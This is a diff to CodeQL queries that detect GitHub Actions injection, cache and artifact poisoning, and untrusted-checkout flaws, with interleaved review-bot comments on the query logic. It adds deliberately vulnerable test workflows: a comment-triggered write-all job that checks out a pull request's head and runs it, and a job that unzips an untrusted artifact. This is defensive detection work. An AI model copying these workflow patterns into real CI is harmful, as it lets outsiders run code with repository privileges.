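Review bot: In EnvPathInjectionMedium.ql the old condition applied the artifact/file-read filter only inside the `inNonPrivilegedJob` branch, whereas the new `inNonPrivilegedContext(...) and (...)` applies it to composite actions as well, so an artifact-sourced flow into a non-file-read sink inside a composite action is no longer reported; EnvVarInjectionMedium.ql (L6068) makes the same change. If the narrowing is intended, a comment above the filter, `// the artifact-to-file-read restriction applies to composite actions and jobs alike`, documents it; otherwise keep the filter on the job branch only.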
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 4b0799ca4410..320feb4e1335 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -16,25 +16,17 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { - ( - not source.(RemoteFlowSource).getSourceType() = "artifact" - or - source.(RemoteFlowSource).getSourceType() = "artifact" and - sink instanceof EnvVarInjectionFromFileReadSink - ) -} - from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and - // exclude paths to file read sinks from non-artifact sources - artifactToFileRead(source.getNode(), sink.getNode()) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 7eb239e83a06..bccb61ae6ea6 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql 
@@ -16,24 +16,16 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { - ( - not source.(RemoteFlowSource).getSourceType() = "artifact" - or - source.(RemoteFlowSource).getSourceType() = "artifact" and - sink instanceof EnvVarInjectionFromFileReadSink - ) -} - from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inNonPrivilegedJob(sink.getNode().asExpr()) and - // exclude paths to file read sinks from non-artifact sources - artifactToFileRead(source.getNode(), sink.getNode()) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 2c2ab2f2af5b..689424782842 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql 
@@ -19,11 +19,7 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) + inPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql index 072ebbc8dced..5feacedc40bf 100644 --- a/ql/src/Security/CWE-078/CommandInjectionMedium.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -19,10 +19,7 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) + inNonPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 3b968ceaf138..f37c374658ae 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
@@ -17,15 +17,12 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and + inPrivilegedContext(sink.getNode().asExpr()) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index abecaf997c6b..43f4eb9c38a2 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -17,14 +17,12 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) and + inNonPrivilegedContext(sink.getNode().asExpr()) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index f202b1fcecf7..607a13e142c0 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -15,6 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } @@ -23,6 +24,8 @@ where j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.protects(checkout, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -51,4 +54,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, checkout, s, "Potential cache poisoning in the context of the default branch" +select s, checkout, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 030dd872cb28..e7f1385f3cda 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
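Review bot: The new exclusion in CachePoisoning.ql calls `check.protects(checkout, j.getATriggerEvent())` although the event under evaluation is already bound to `e` on the line above, so a check that protects a different trigger of the same job suppresses the finding for an unprotected `issue_comment` trigger too; `not exists(ControlCheck check | check.protects(checkout, e)) and` keeps the check tied to the event being evaluated. CachePoisoningByCodeInjection.ql (L6072) has the same form and additionally passes `source.getNode().asExpr()`, an expression, where `protects` is declared on `Step` (L6061), so there the exclusion cannot apply unless that expression is itself a Step.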
@@ -16,12 +16,19 @@ import actions import codeql.actions.security.CodeInjectionQuery import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e where + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.protects(source.getNode().asExpr(), j.getATriggerEvent())) and + // excluding privileged workflows since they can be exploited in easier circumstances + not j.isPrivileged() and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -32,11 +39,7 @@ where caller.getCallee() = j.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) - ) and - // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() and - CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() + ) select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index d28cca11a569..bbbab7bcab70 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
@@ -22,37 +22,14 @@ from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - // the checkout is followed by a known poisonable step + // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the mutable checkout step is protected by an access check + j.isPrivilegedExternallyTriggerable() and + // the mutable checkout step is protected by an Insufficient access check check.dominates(checkout) and - // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() instanceof PoisonableStep and - ( - // environment gates do not depend on the triggering event - check instanceof EnvironmentCheck - or - // label gates do not depend on the triggering event - check instanceof LabelCheck - or - // actor or association gates are only bypassable for IssueOps - // since an attacker can wait for a privileged user to comment on an issue - // and then mutate the checked-out code. - // however, when used for pull_request_target, the check is not bypassable since - // the actor checked is the author of the PR - ( - check instanceof AssociationCheck or - check instanceof ActorCheck or - check instanceof PermissionCheck - ) and - check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") - ) + check.protects(checkout, j.getATriggerEvent()) and + check.protectsAgainstRefMutationAttacks() = false select s, checkout, s, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 6448f1a05a85..b9b3154debfc 100644 
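Review bot: `check.dominates(checkout)` is now implied by `check.protects(checkout, j.getATriggerEvent())`, whose body (L6061) already requires `this.dominates(step)`, so the line is redundant; UntrustedCheckoutTOCTOUHigh.ql (L6074) has the same pair. The comment `// the mutable checkout step is protected by an Insufficient access check` would read better as `// the mutable checkout is gated by a check that does not protect against ref mutation`. The removed branch explained that actor/association gates are bypassable for `%_comment` events; since `getAProtectedEvent` now lists only pull-request events, comment-triggered jobs no longer produce results here and, as far as I can tell, surface through `inPrivilegedContext` in UntrustedCheckoutCritical.ql instead, which deserves a sentence in the query's header comment so the move is not read as lost coverage.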
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,37 +16,18 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from MutableRefCheckoutStep checkout, ControlCheck check +from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check where - // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and - // the mutable checkout step is protected by an access check + // the checkout occurs in a privileged context + j.isPrivilegedExternallyTriggerable() and + // the mutable checkout step is protected by an Insufficient access check check.dominates(checkout) and - ( - // environment gates do not depend on the triggering event - check instanceof EnvironmentCheck - or - // label gates do not depend on the triggering event - check instanceof LabelCheck - or - // actor or association gates are only bypassable for IssueOps - // since an attacker can wait for a privileged user to comment on an issue - // and then mutate the checked-out code. - // however, when used for pull_request_target, the check is not bypassable since - // the actor checked is the author of the PR - ( - check instanceof AssociationCheck or - check instanceof ActorCheck or - check instanceof PermissionCheck - ) and - check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") - ) + check.protects(checkout, j.getATriggerEvent()) and + check.protectsAgainstRefMutationAttacks() = false select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() 
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index a7d2518564de..82c6f936c51f 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -14,15 +14,12 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) + inPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql index a4fb958b7f96..992b2aa8c5d4 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql @@ -14,14 +14,12 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) + inNonPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index c1d72dd46648..a0da81bde22a 100644 
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -27,11 +27,5 @@ where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) + inPrivilegedContext(checkout) select s, checkout, s, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 468a1214c62d..dba0dadb61bf 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -25,11 +25,5 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) + inPrivilegedContext(checkout) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 3edde8dcf547..ca91fcb9048a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql 
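Review bot: Replacing `not exists(ControlCheck check | check.dominates(checkout))` with `inPrivilegedContext(checkout)` removes the control-check exclusion for composite actions: in the Helper.qll hunk at L6059 only the `inPrivilegedExternallyTriggerableJob` branch consults `protects`, and `protects` needs a trigger event that a composite action does not have, so a checkout gated by a dominating `if:` inside a composite action is now reported unless `inPrivilegedCompositeAction`, whose body is outside this diff, handles it; UntrustedCheckoutHigh.ql on the same line changes identically. If that is deliberate, a comment such as `// composite actions: control checks are not evaluated, there is no trigger event to judge them against` makes it explicit; otherwise keep a `dominates`-based exclusion for the composite-action branch.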
@@ -22,11 +22,6 @@ from LocalJob j, PRHeadCheckoutStep checkout
 where
   j = checkout.getEnclosingJob() and
   j.getAStep() = checkout and
-  // the checkout is not controlled by an access check
-  not exists(ControlCheck check | check.dominates(checkout)) and
   // the checkout occurs in a non-privileged context
-  (
-    inNonPrivilegedCompositeAction(checkout) or
-    inNonPrivilegedJob(checkout)
-  )
+  inNonPrivilegedContext(checkout)
 select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
index 498b46090cbf..a4acd7387660 100644
--- a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
+++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
@@ -5,13 +5,11 @@ on:
     types: [created]
 permissions: 'write-all'
 jobs:
-  benchmark:
-    name: Integration Tests
+  test1:
     if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
-    runs-on: [ubuntu-latest]
+    runs-on: ubuntu-latest
     steps:
-      # test1
 
       - uses: actions/github-script@v6
         name: Get PR branch
         id: issue
@@ -33,7 +31,36 @@ jobs:
           ref: ${{ fromJson(steps.issue.outputs.result).sha }}
       - run: bash comment_example/tests.sh
-      # test2
 
+  test2:
+    if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+    runs-on: ubuntu-latest
+    steps:
+
+      - uses: actions/github-script@v6
+        name: Get PR branch
+        id: issue
+        with:
+          script: |
+            const pr = context.payload.issue.number
+            const data = await github.rest.pulls.get({
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              pull_number: pr
+            })
+            return {
+              ref: data.data.head.ref,
+              sha: data.data.head.sha,
+            }
+      - uses: actions/checkout@v4
+        with:
+          submodules: recursive
+          ref: ${{ fromJson(steps.issue.outputs.result).ref }}
+      - run: bash comment_example/tests.sh
+
+  test3:
+    if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+    runs-on: ubuntu-latest
+    steps:
       - uses: actions/checkout@v4
         with:
           submodules: recursive
diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
index 01045ddde5e1..e2c4d9660634 100644
--- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
+++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
@@ -1,15 +1,12 @@ edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:30:9:34:6 | Uses Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:34:9:37:6 | Run Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:34:9:37:6 | Run Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:64:9:68:6 | 
Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | 
@@ -19,7 +16,6 @@ edges | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | #select -| .github/workflows/comment.yml:41:9:41:43 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | | .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | | .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | | .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml new file mode 100644 index 000000000000..a4acd7387660 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml 
@@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: 
bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml new file mode 100644 index 000000000000..f532e4266ad1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml @@ -0,0 +1,45 @@ +name: Test + + +on: + workflow_run: + workflows: ["Foo"] + types: + - completed + +jobs: + docker: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + outputs: + version-json: ${{ steps.show_versions.outputs.version-json }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchArtifactNacos = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "nacos" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifactNacos.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/nacos.zip', Buffer.from(download.data)); + - run: | + unzip nacos.zip + mkdir nacos + cp -r nacos-* nacos/ + - name: save docker_2 images + run: | + mv ./build_backup/* nacos-e2e/cicd/build/ diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 87289c178af7..78e2afa2747a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
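Review bot: UntrustedCheckoutCritical.expected now flags the `run` step of all three jobs in this fixture, including `test1`, which checks out the resolved `sha` rather than the branch `ref`, and nothing in the file says why the `author_association` gate in each `if:` is not treated as a sufficient control. A comment under the source URL would make that expectation reviewable, e.g. `# All three jobs are expected findings: the gate checks who commented, not whose code the PR head holds, and the head is resolved by the job after the comment, so it can change in between.` — if the gate is meant to count for some of these jobs, the expected file rather than the fixture needs attention. This file also has the same blob id (a4acd7387660) as CWE-367/.github/workflows/comment.yml in this commit; a comment saying the two are meant to stay identical would keep them from drifting silently.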
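Review bot: This fixture carries no header comment naming the query it exercises, unlike test5.yml, and the only expected-output change for it in this chunk is the edges list in UntrustedCheckoutCritical.expected rather than an ArtifactPoisoning result; if the intended finding lives in an expected file not shown here, a comment pointing at it would help. Suggested first line: `# Artifact poisoning fixture: a workflow_run job downloads an artifact produced by a pull_request run, unzips it into the workspace and moves its contents into the build tree.` The `${{ github.event.workflow_run.id }}` expression inside the script and the `actions/github-script@v3.1.0` pin are presumably part of the pattern under test, so the comment should say so to stop a later cleanup from "fixing" them.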
